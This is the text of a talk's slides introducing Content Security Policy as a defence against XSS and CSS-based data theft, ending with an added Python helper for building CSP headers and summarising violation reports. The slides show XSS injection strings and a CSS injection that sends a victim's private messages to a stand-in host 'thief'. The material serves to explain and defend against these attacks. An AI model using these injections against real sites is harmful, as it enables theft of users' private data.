Hackers!

how to keep them at bay

Introduction to Content Security Policy

Who's that guy?

Zbyszek Tenerowicz

@naugtur
http://naugtur.pl

R&D at

Regular speaker at

Dangers

Clickjacking

Data theft

CSRF

XSS

Session hijack

Popular security

Not in the scope for today

✔ Session cookies: domain, secure, httponly

✔ X-Frame-Options header

✔ Iframe sandboxing

✔ CSRF tokens

Dangers left

Persistent XSS

Reflected XSS

Data theft

Where do threats come from?

The good

Bugs in application

✔ they can be fixed

The bad

Extensions, 3rd parties and user scripts

✘ at least they're not common...

The ugly

Vulnerable as specified

☢ iframes, clickjacking, stealing data with CSS

Persistent XSS

Input is saved and application serves it to victims

    foo" onmouseover="CODE"

or

    {{ username }}

    <script>CODE</script>

Reflected XSS

Input is not stored by the application

    404 not found: {{ URL }}

    http://mydomain.com/<script>CODE</script>

XSS can be used to

Perform actions as currently logged-in user

Steal data available to logged-in user

Infect user with malware

Wanna be a hacker? Start here: https://github.com/cure53/H5SC

CSS data theft

  1. Send a message:

      ');}

  2. Wait for messages to steal
  3. Send a message:

      {}body{background-image:url('http://thief/

  4. Make the user open a site where his inbox is loaded as CSS

      <p>{}body{background-image:url('http://thief/
      </p><p>private message</p><p>');}</p>

Works with JavaScript disabled

Content Security Policy

Just add headers

    Content-Security-Policy:
        script-src 'self' https://apis.google.com

Tutorial on html5rocks.com

Capabilities

  • Source whitelists for all resources
  • Block eval
  • Block inline scripts
  • Block event attributes

✔ Any XSS bug in the app is now useless

✔ Extensions can't add code to your app

✔ Cross-domain requests to domains you approve

✘ Protects only HTML documents

Browser support

Guess which directive is supported in IE

Details: caniuse.com

Example from github

    Content-Security-Policy:
        default-src *;
        script-src
            https://github.global.ssl.fastly.net
            https://ssl.google-analytics.com
            https://collector-cdn.github.com;
        style-src 'self' 'unsafe-inline' 'unsafe-eval'
            https://github.global.ssl.fastly.net;
        object-src https://github.global.ssl.fastly.net

Deployment

Check if your app breaks the policy without blocking it

    Content-Security-Policy-Report-Only:
        default-src 'self'; report-uri /csp;

What do I do with a report?

It's a work in progress, but I'm on it
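As an added example (not code from the talk): a small Python helper that builds the header shown above from a policy dict, single-quoting CSP keywords such as 'self' (a bare or double-quoted self is read as a host name and matches nothing), and that reduces the JSON a browser POSTs to report-uri to the fields worth acting on. The report field names assumed are those of the CSP report format (document-uri, violated-directive, effective-directive, blocked-uri); the sample report is constructed.

```python
import json

# CSP keywords have to be single-quoted in the header; written bare or in
# double quotes they are parsed as host names and silently match nothing.
KEYWORDS = {"self", "none", "unsafe-inline", "unsafe-eval"}


def build_csp_header(policy, report_only=False, report_uri=None):
    """Turn {"script-src": ["self", "https://apis.google.com"]} into a
    (header name, header value) pair, Report-Only when asked for."""
    name = "Content-Security-Policy"
    if report_only:
        name += "-Report-Only"
    parts = []
    for directive, sources in policy.items():
        quoted = ["'%s'" % s if s in KEYWORDS else s for s in sources]
        parts.append("%s %s" % (directive, " ".join(quoted)))
    if report_uri:
        parts.append("report-uri %s" % report_uri)
    return name, "; ".join(parts)


def summarize_report(body):
    """Reduce the JSON a browser POSTs to report-uri to the fields a
    defender acts on: which page, which directive, what was blocked."""
    report = json.loads(body)["csp-report"]
    blocked = report.get("blocked-uri", "")
    # Inline script and eval are reported with an empty, "inline" or
    # "eval" blocked-uri rather than with an origin.
    if blocked in ("", "inline", "eval"):
        blocked = "inline code"
    return {
        "document": report.get("document-uri"),
        "directive": report.get("effective-directive")
        or report.get("violated-directive", "").split(" ")[0],
        "blocked": blocked,
    }


# Constructed sample report, shaped like what a browser sends for a
# violation of "default-src 'self'; report-uri /csp" by an inline script.
SAMPLE_REPORT = json.dumps({"csp-report": {
    "document-uri": "https://app.example/inbox",
    "violated-directive": "default-src 'self'",
    "blocked-uri": "",
    "original-policy": "default-src 'self'; report-uri /csp",
}})

if __name__ == "__main__":
    print(build_csp_header({"default-src": ["self"]}, True, "/csp"))
    print(summarize_report(SAMPLE_REPORT))
```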

Play safe!

@naugtur
http://naugtur.pl